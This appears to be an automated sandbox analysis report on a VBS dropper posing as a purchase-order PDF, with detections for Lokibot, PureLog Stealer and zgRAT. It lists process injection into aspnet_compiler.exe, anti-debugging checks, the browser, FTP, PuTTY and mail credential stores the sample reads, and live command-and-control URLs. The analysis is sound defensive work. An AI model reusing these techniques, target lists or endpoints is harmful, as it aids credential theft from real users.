Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 700000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 4320000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 5316	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 1936	Thread sleep time: -720000s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 4_2_00403D74 FindFirstFileW,

4_2_00403D74

Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60000			Jump to behavior

Source: x.exe, 00000002.00000002.2278008968.0000000003571000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
Source: x.exe, 00000002.00000002.2278008968.0000000003602000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2278008968.00000000035BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
Source: wscript.exe, 00000000.00000002.2257514976.000001A473A15000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: x.exe, 00000002.00000002.2278008968.0000000003515000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2278008968.000000000343A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2278008968.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2278008968.0000000003491000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byr
Source: x.exe, 00000002.00000002.2278008968.0000000003345000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %vL+o+HIpxflaQUFdyuioERPAot/W4EM5/xTa5gjxAAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5O
Source: aspnet_compiler.exe, 00000004.00000002.3494407989.0000000000B48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\x.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 2_2_0495ACA0 CheckRemoteDebuggerPresent,

2_2_0495ACA0

Source: C:\Users\user\AppData\Local\Temp\x.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 4_2_0040317B mov eax, dword ptr fs:[00000030h]

4_2_0040317B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 4_2_00402B7C GetProcessHeap,RtlAllocateHeap,

4_2_00402B7C

Source: C:\Users\user\AppData\Local\Temp\x.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: x.exe.0.dr

Jump to dropped file

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 6EE008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: x.exe, 00000002.00000002.2277675709.000000000243F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: x.exe, 00000002.00000002.2277675709.000000000243F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progman
Source: x.exe, 00000002.00000002.2277675709.000000000243F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndt-
Source: x.exe, 00000002.00000002.2277675709.000000000243F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progmant-

Source: C:\Users\user\AppData\Local\Temp\x.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x.exe PID: 7020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 4596, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.3494407989.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 2.0.x.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wscript.exe.1a474030090.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wscript.exe.1a474030090.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.2248791752.0000000000072000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2257758604.000001A474030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2249190359.000001A4732E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2249613824.000001A473A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2252966243.000001A4735D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 2.0.x.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wscript.exe.1a474030090.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wscript.exe.1a474030090.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: PopPassword		4_2_0040D069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: SmtpPassword		4_2_0040D069

Source: Yara match	File source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 2.0.x.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wscript.exe.1a474030090.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wscript.exe.1a474030090.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.2248791752.0000000000072000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2257758604.000001A474030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2249190359.000001A4732E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2249613824.000001A473A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2252966243.000001A4735D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 2.0.x.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wscript.exe.1a474030090.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wscript.exe.1a474030090.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	1 Exploitation for Client Execution	221 Scripting	312 Process Injection	1 Masquerading	2 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 Credentials in Registry	2 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	312 Process Injection	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	13 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	5 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs	22%	Virustotal		Browse
#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs	32%	ReversingLabs	Script-WScript.Trojan.AgentTesla

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\x.exe	100%	Avira	HEUR/AGEN.1362225
C:\Users\user\AppData\Local\Temp\x.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\x.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Local\Temp\x.exe	40%	Virustotal		Browse
C:\Users\user\AppData\Roaming\188E93\31437F.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\188E93\31437F.exe	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
altaskifer.sbs	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://kbfvzoboss.bid/alien/fre.php	100%	URL Reputation	malware
http://alphastand.win/alien/fre.php	100%	URL Reputation	malware
http://alphastand.win/alien/fre.php	100%	URL Reputation	malware
http://alphastand.trade/alien/fre.php	100%	URL Reputation	malware
http://alphastand.top/alien/fre.php	100%	URL Reputation	malware
http://www.ibsensoftware.com/	0%	URL Reputation	safe
https://altaskifer.sbs/PWS/fre.php	0%	Avira URL Cloud	safe
http://altaskifer.sbs/PWS/fre.php	0%	Avira URL Cloud	safe
https://altaskifer.sbs/PWS/fre.php	1%	Virustotal		Browse
http://altaskifer.sbs/PWS/fre.php	3%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
